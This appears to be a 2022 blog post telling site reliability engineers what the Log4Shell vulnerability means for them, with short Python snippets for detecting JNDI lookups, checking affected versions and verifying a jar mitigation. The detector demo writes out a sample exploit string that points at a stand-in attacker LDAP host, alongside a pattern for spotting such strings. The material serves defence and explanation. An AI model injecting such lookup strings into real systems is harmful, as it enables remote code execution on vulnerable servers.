What the Log4j Vulnerability Means for SREs

Weihan Li

January 7, 2022

If you’re an SRE, you’ve almost certainly heard all about Log4Shell, the Log4j vulnerability that some analysts are calling the worst software security flaw in decades. Hopefully, you’ve also patched every system you manage by now (if you haven’t, go do that right away!).

Even after you’ve patched Log4Shell in your environments, though, you shouldn’t push the vulnerability to the back of your mind. For SREs, there are some important lessons to glean from this fiasco.

Toward that end, here’s a look at four key takeaways from Log4Shell for SREs.

Log4Shell in a nutshell

Let’s start with a brief overview of what happened.

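Log4Shell (CVE-2021-44228) is a vulnerability that enables remote code execution within applications that use Log4j, a Java-based logging framework. When a vulnerable version of Log4j logs a string that contains a lookup expression such as ${jndi:ldap://...}, it resolves that expression through the Java Naming and Directory Interface (JNDI). By getting such a string into anything the application logs, such as a request header or a form field, attackers can make the application load and run malicious code from an LDAP server they control.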

As vulnerabilities go, this is a very bad one. It’s not particularly hard to exploit, and it gives attackers essentially a blank check when it comes to what they can do once they’ve breached an app.
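To make the mechanism concrete, the exploit strings took the form of a Log4j lookup expression placed in any input the application ends up logging. The following is a minimal Python sketch, not a production detector, that flags the plain form of such expressions in a piece of text. The function name and the `attacker.example` hostname are hypothetical, and the pattern is assumed to cover only unobfuscated lookups, so it is no substitute for patching.

```python
import re
from typing import List

# Matches the plain form of a Log4j JNDI lookup, e.g. "${jndi:ldap://host/a}".
# Assumption: obfuscated variants such as "${${lower:j}ndi:...}" are NOT
# covered here, even though real attacks also used them.
JNDI_LOOKUP = re.compile(r"\$\{jndi:(?:ldap|ldaps|rmi|dns)://[^}]*\}", re.IGNORECASE)


def find_jndi_lookups(text: str) -> List[str]:
    """Return every plain JNDI lookup expression found in text."""
    return [match.group(0) for match in JNDI_LOOKUP.finditer(text)]


# Hypothetical request header that an application might pass to its logger.
user_agent = "Mozilla/5.0 ${jndi:ldap://attacker.example/a}"
print(find_jndi_lookups(user_agent))  # ['${jndi:ldap://attacker.example/a}']
```

A check like this is only useful for spotting exploitation attempts in logs you already have; it does nothing to stop a vulnerable Log4j version from resolving the lookup.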

The good news is that not all versions of Log4j are affected (although many – specifically, versions 2.0-beta9 to 2.14.1 – are). You can use this scanner to check whether the Java applications you run are subject to the vulnerability – although a best practice is simply to assume your applications are vulnerable and patch them immediately. It’s better to waste a little time patching a non-vulnerable application than it is to waste time figuring out whether your application is vulnerable, only to discover that it is and has been exploited while you were busy scanning it.

After all, it’s clear that the bad guys are already working hard to identify and exploit apps that are vulnerable to Log4Shell.
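If you do want a quick triage step before patching, the version range quoted above can be expressed as a small check. This is a Python sketch under stated assumptions: the function names are hypothetical, only the 2.0-beta9 to 2.14.1 range from this article is encoded, and backported security releases on older branches are not accounted for. Anything it cannot parse is treated as vulnerable, in line with the advice to assume the worst.

```python
import re
from typing import Optional, Tuple

# Ordering of Log4j 2.0 pre-release qualifiers; a final release sorts last.
_QUALIFIER_RANK = {"alpha": 0, "beta": 1, "rc": 2, "": 3}
_VERSION = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d+))?$")


def parse_version(version: str) -> Optional[Tuple[int, int, int, int, int]]:
    """Turn '2.0-beta9' or '2.14.1' into a sortable tuple, or None if unparseable."""
    m = _VERSION.match(version.strip())
    if m is None:
        return None
    major, minor, patch, qualifier, number = m.groups()
    return (int(major), int(minor), int(patch or 0),
            _QUALIFIER_RANK[qualifier or ""], int(number or 0))


FIRST_AFFECTED = parse_version("2.0-beta9")
LAST_AFFECTED = parse_version("2.14.1")


def in_affected_range(version: str) -> bool:
    """Return True if version falls within 2.0-beta9..2.14.1 (inclusive)."""
    parsed = parse_version(version)
    if parsed is None:
        return True  # Unknown format: assume vulnerable rather than guess.
    return FIRST_AFFECTED <= parsed <= LAST_AFFECTED


for candidate in ["1.2.17", "2.0-beta8", "2.0-beta9", "2.14.1", "2.15.0"]:
    print(candidate, in_affected_range(candidate))
```

A result of False here only means the version is outside the range cited in this article; it says nothing about other vulnerabilities that may affect that version.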

What SREs can learn from Log4Shell

Beyond underlining the importance of being aware of software vulnerabilities and patching them as quickly as possible, the Log4Shell fiasco offers additional lessons for SREs.

Secure your observability tooling

From an SRE’s perspective, Log4Shell is interesting because it targets a category of tooling that is central to the work SREs perform: logging and observability.

That’s not to say that observability tools or frameworks pose special security risks, of course. Any type of software can be hacked.

Still, Log4Shell serves as a reminder that it’s not just application cores that need to be secured. You must also think about the ancillary tooling, including logging frameworks like Log4j, that supports your application.

This risk is especially worth noting because we’re likely to see more and more logging and observability tooling deployed in the future, as SREs have to work harder and harder to keep tabs on what is happening within the complex systems they manage. And more tooling means more potential vulnerabilities.

Involve SREs in security

We’ve said it before, and the Log4Shell affair presents a great opportunity to say it again: SREs need to be centrally involved in security operations, despite the fact that they are often left out of the DevSecOps conversation.

After all, without the participation of SREs, it’s hard to imagine organizations applying patches for vulnerabilities like Log4Shell quickly. The teams that reacted fastest were most likely those where SREs and security engineers were already used to collaborating closely before the security incident arose.

Plan ahead for mitigation strategies

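Fortunately, in the case of Log4Shell, a patch to address the vulnerability became available almost immediately, in Log4j 2.15.0, although that first fix proved incomplete and several follow-up releases were needed in the weeks that followed.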

But if that hadn’t happened, organizations that use Log4j for critical applications would have found themselves in the dangerous situation of having to run vulnerable software and hope a fix arrived soon – unless they had planned ahead and were able to disable the Log4j framework within their environments while waiting for a fix.

The point here is that it’s a best practice to assume that any tool or layer within your stack may need to be taken offline unexpectedly for security or other reasons. SREs who design software environments with this reality in mind (for example, by making maximum use of modularity) place their organizations in a stronger position to react to the unforeseen, which is precisely what reliability management is all about.
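For Log4Shell specifically, one widely documented interim mitigation was to remove the JndiLookup class from the log4j-core jar, which disables the vulnerable lookup without taking logging offline. The Python sketch below shows how a team might verify that this step has been applied to a given jar. The function name and the demo jar are hypothetical, and the check is assumed to look only at the top level of the archive, so jars nested inside a WAR or fat jar would need separate handling.

```python
import os
import tempfile
import zipfile

# Path of the lookup class inside a log4j-core jar.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def jar_has_jndi_lookup(jar_path: str) -> bool:
    """Return True if the jar at jar_path still bundles the JndiLookup class."""
    with zipfile.ZipFile(jar_path) as jar:
        return JNDI_LOOKUP_CLASS in jar.namelist()


# Demo with a throwaway jar (a jar is a zip archive) rather than a real one.
with tempfile.TemporaryDirectory() as tmp:
    demo_jar = os.path.join(tmp, "demo-core.jar")
    with zipfile.ZipFile(demo_jar, "w") as jar:
        jar.writestr(JNDI_LOOKUP_CLASS, b"")  # Empty placeholder entry.
    print(jar_has_jndi_lookup(demo_jar))  # True
```

Having a check like this scripted in advance is one small example of planning for mitigation: when a fix is delayed, you can confirm across many hosts that the stopgap is actually in place.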

Rapid incident response is critical

The importance of being able to react quickly to incidents of any type – whether they involve security issues or reliability and performance problems – almost goes without saying. But we’ll say it anyway because it’s easy to fall into the trap of ignoring the significance of an incident response plan until disaster strikes.

So, if you don’t already have plans and tools in place to ensure that your team can react quickly to whatever incidents arise, the Log4Shell fiasco is as good a reminder as any that you should invest in those resources now. Don’t wait until you’re in the midst of a critical incident to figure out how to respond efficiently.

Conclusion

Even if you’ve applied your patches and put Log4Shell behind you, you know it’s only a matter of time before another critical vulnerability arises.

You have no way of knowing exactly what that vulnerability will be or which systems it will affect. Nonetheless, you can put your team in the strongest position possible by ensuring that your SREs are plugged into security and DevSecOps processes on a continuous basis. Paying attention to the security implications of ancillary tooling (like logging frameworks), as well as planning in advance for events that require critical systems to be taken offline or temporarily disabled, will go a long way toward enabling a strong security posture, too.